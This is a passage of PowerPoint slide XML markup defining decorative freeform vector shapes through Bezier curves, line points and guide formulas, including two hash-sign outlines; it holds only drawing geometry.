                    <a:cubicBezTo>
                      <a:pt x="69" y="181"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="76" y="185"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="187"/>
                      <a:pt x="91" y="187"/>
                      <a:pt x="96" y="185"/>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8"/>
                      <a:pt x="116" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="113" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="116" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="118" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="157"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="119" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="125" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="128" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="139" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="98"/>
                      <a:pt x="134" y="104"/>
                      <a:pt x="136" y="110"/>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4"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="103"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="116" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="106" y="61"/>
                      <a:pt x="106" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="54"/>
                      <a:pt x="103" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="53"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="91" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="91" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="38"/>
                      <a:pt x="94" y="36"/>
                      <a:pt x="97" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="37"/>
                      <a:pt x="100" y="38"/>
                      <a:pt x="101" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="106" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="99" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="87" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="39"/>
                      <a:pt x="86" y="41"/>
                      <a:pt x="86" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="44"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="46"/>
                      <a:pt x="82" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="79" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="77" y="46"/>
                      <a:pt x="77" y="44"/>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0"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="67" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="49"/>
                      <a:pt x="67" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="70" y="36"/>
                      <a:pt x="72" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="40"/>
                      <a:pt x="74" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="48"/>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="51"/>
                      <a:pt x="68" y="53"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="54"/>
                      <a:pt x="64" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="67"/>
                      <a:pt x="77" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="90" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="102" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="101" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="63"/>
                      <a:pt x="91" y="66"/>
                      <a:pt x="86" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="69"/>
                      <a:pt x="78" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="42"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="42"/>
                      <a:pt x="71" y="43"/>
                      <a:pt x="71" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="71"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5" name="Freeform 122"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4080" y="3708"/>
                <a:ext cx="3"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0"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6" name="Freeform 123"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4093" y="3708"/>
                <a:ext cx="3" cy="3"/>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2" y="2"/>
                      <a:pt x="2"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Freeform 124"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2044"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Freeform 125"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 126"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2388"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Freeform 127"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2813"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Freeform 128"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2960"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2" name="Freeform 129"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3159"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Freeform 130"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3308"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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23"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4" name="Freeform 131"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3456" y="4023"/>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Freeform 132"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3654"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Freeform 133"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="380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Freeform 134"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3996"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Freeform 135"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="419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Freeform 136"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4389"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Freeform 137"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="453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Freeform 138"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723" y="4027"/>
                <a:ext cx="187" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 187"/>
                  <a:gd name="T1" fmla="*/ 67 h 220"/>
                  <a:gd name="T2" fmla="*/ 184 w 187"/>
                  <a:gd name="T3" fmla="*/ 85 h 220"/>
                  <a:gd name="T4" fmla="*/ 141 w 187"/>
                  <a:gd name="T5" fmla="*/ 85 h 220"/>
                  <a:gd name="T6" fmla="*/ 130 w 187"/>
                  <a:gd name="T7" fmla="*/ 135 h 220"/>
                  <a:gd name="T8" fmla="*/ 176 w 187"/>
                  <a:gd name="T9" fmla="*/ 135 h 220"/>
                  <a:gd name="T10" fmla="*/ 173 w 187"/>
                  <a:gd name="T11" fmla="*/ 153 h 220"/>
                  <a:gd name="T12" fmla="*/ 126 w 187"/>
                  <a:gd name="T13" fmla="*/ 153 h 220"/>
                  <a:gd name="T14" fmla="*/ 112 w 187"/>
                  <a:gd name="T15" fmla="*/ 220 h 220"/>
                  <a:gd name="T16" fmla="*/ 91 w 187"/>
                  <a:gd name="T17" fmla="*/ 220 h 220"/>
                  <a:gd name="T18" fmla="*/ 106 w 187"/>
                  <a:gd name="T19" fmla="*/ 153 h 220"/>
                  <a:gd name="T20" fmla="*/ 64 w 187"/>
                  <a:gd name="T21" fmla="*/ 153 h 220"/>
                  <a:gd name="T22" fmla="*/ 50 w 187"/>
                  <a:gd name="T23" fmla="*/ 220 h 220"/>
                  <a:gd name="T24" fmla="*/ 29 w 187"/>
                  <a:gd name="T25" fmla="*/ 220 h 220"/>
                  <a:gd name="T26" fmla="*/ 42 w 187"/>
                  <a:gd name="T27" fmla="*/ 153 h 220"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 153 h 220"/>
                  <a:gd name="T30" fmla="*/ 2 w 187"/>
                  <a:gd name="T31" fmla="*/ 135 h 220"/>
                  <a:gd name="T32" fmla="*/ 47 w 187"/>
                  <a:gd name="T33" fmla="*/ 135 h 220"/>
                  <a:gd name="T34" fmla="*/ 57 w 187"/>
                  <a:gd name="T35" fmla="*/ 85 h 220"/>
                  <a:gd name="T36" fmla="*/ 11 w 187"/>
                  <a:gd name="T37" fmla="*/ 85 h 220"/>
                  <a:gd name="T38" fmla="*/ 14 w 187"/>
                  <a:gd name="T39" fmla="*/ 67 h 220"/>
                  <a:gd name="T40" fmla="*/ 61 w 187"/>
                  <a:gd name="T41" fmla="*/ 67 h 220"/>
                  <a:gd name="T42" fmla="*/ 74 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 220"/>
                  <a:gd name="T44" fmla="*/ 95 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 220"/>
                  <a:gd name="T46" fmla="*/ 81 w 187"/>
                  <a:gd name="T47" fmla="*/ 67 h 220"/>
                  <a:gd name="T48" fmla="*/ 123 w 187"/>
                  <a:gd name="T49" fmla="*/ 67 h 220"/>
                  <a:gd name="T50" fmla="*/ 137 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 220"/>
                  <a:gd name="T52" fmla="*/ 158 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 220"/>
                  <a:gd name="T54" fmla="*/ 145 w 187"/>
                  <a:gd name="T55" fmla="*/ 67 h 220"/>
                  <a:gd name="T56" fmla="*/ 187 w 187"/>
                  <a:gd name="T57" fmla="*/ 67 h 220"/>
                  <a:gd name="T58" fmla="*/ 120 w 187"/>
                  <a:gd name="T59" fmla="*/ 85 h 220"/>
                  <a:gd name="T60" fmla="*/ 78 w 187"/>
                  <a:gd name="T61" fmla="*/ 85 h 220"/>
                  <a:gd name="T62" fmla="*/ 67 w 187"/>
                  <a:gd name="T63" fmla="*/ 135 h 220"/>
                  <a:gd name="T64" fmla="*/ 109 w 187"/>
                  <a:gd name="T65" fmla="*/ 135 h 220"/>
                  <a:gd name="T66" fmla="*/ 120 w 187"/>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20">
                    <a:moveTo>
                      <a:pt x="187" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="67"/>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2" name="Freeform 139"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4940"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Freeform 140"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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Freeform 141"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5286" y="4023"/>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Freeform 142"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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Freeform 143"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="563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7" name="Freeform 144"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5828"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8" name="Freeform 145"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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Freeform 146"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6172"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Freeform 147"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6356" y="4027"/>
                <a:ext cx="189" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 220"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 85 h 220"/>
                  <a:gd name="T4" fmla="*/ 142 w 189"/>
                  <a:gd name="T5" fmla="*/ 85 h 220"/>
                  <a:gd name="T6" fmla="*/ 131 w 189"/>
                  <a:gd name="T7" fmla="*/ 135 h 220"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 135 h 220"/>
                  <a:gd name="T10" fmla="*/ 174 w 189"/>
                  <a:gd name="T11" fmla="*/ 153 h 220"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 153 h 220"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 220 h 220"/>
                  <a:gd name="T16" fmla="*/ 92 w 189"/>
                  <a:gd name="T17" fmla="*/ 220 h 220"/>
                  <a:gd name="T18" fmla="*/ 107 w 189"/>
                  <a:gd name="T19" fmla="*/ 153 h 220"/>
                  <a:gd name="T20" fmla="*/ 64 w 189"/>
                  <a:gd name="T21" fmla="*/ 153 h 220"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 220 h 220"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 220 h 220"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 153 h 220"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 153 h 220"/>
                  <a:gd name="T30" fmla="*/ 3 w 189"/>
                  <a:gd name="T31" fmla="*/ 135 h 220"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 135 h 220"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 85 h 220"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 85 h 220"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 220"/>
                  <a:gd name="T40" fmla="*/ 62 w 189"/>
                  <a:gd name="T41" fmla="*/ 67 h 220"/>
                  <a:gd name="T42" fmla="*/ 75 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 220"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 220"/>
                  <a:gd name="T46" fmla="*/ 83 w 189"/>
                  <a:gd name="T47" fmla="*/ 67 h 220"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 67 h 220"/>
                  <a:gd name="T50" fmla="*/ 139 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 220"/>
                  <a:gd name="T52" fmla="*/ 159 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 220"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 220"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 220"/>
                  <a:gd name="T58" fmla="*/ 122 w 189"/>
                  <a:gd name="T59" fmla="*/ 85 h 220"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 85 h 220"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 135 h 220"/>
                  <a:gd name="T64" fmla="*/ 111 w 189"/>
                  <a:gd name="T65" fmla="*/ 135 h 220"/>
                  <a:gd name="T66" fmla="*/ 122 w 189"/>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20">
                    <a:moveTo>
                      <a:pt x="189" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="122" y="85"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
